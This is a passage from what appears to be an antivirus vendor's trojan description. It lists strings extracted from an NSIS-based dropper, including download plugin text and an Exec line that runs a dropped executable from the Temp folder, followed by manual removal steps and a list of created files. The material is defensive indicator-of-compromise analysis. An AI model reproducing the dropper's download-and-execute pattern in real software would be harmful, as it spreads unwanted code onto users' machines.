File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\586a26122a99c_ua.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\inetc.dll
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
/password
Uploading %s
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp
nsjCF32.tmp
Exec: command="C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp\586a26122a99c_ua.exe"
p\nsjCF32.tmp\inetc.dll"
:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsjCF32.tmp
"C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe"
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp
sevensetup.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nsdCF11.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\sevensetup.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:292
LF4X4VJWFp.exe:2880
cpSetup.exe:1852
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\main[1].htm (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A2LCUZKZ.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1V9Q60HH.txt (106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (6539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\amipb[1].htm (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (7551 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\amipb[1].htm (271 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\main[1].htm (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\LF4X4VJWFp.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\586abfc3362cc[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\System.dll (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2DD4.tmp\U6cgvnDPb5 (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A0B.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\cpSetup.exe (93723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\Setup__2140_il2.exe (58164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4A2B.tmp\706703874 (974 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.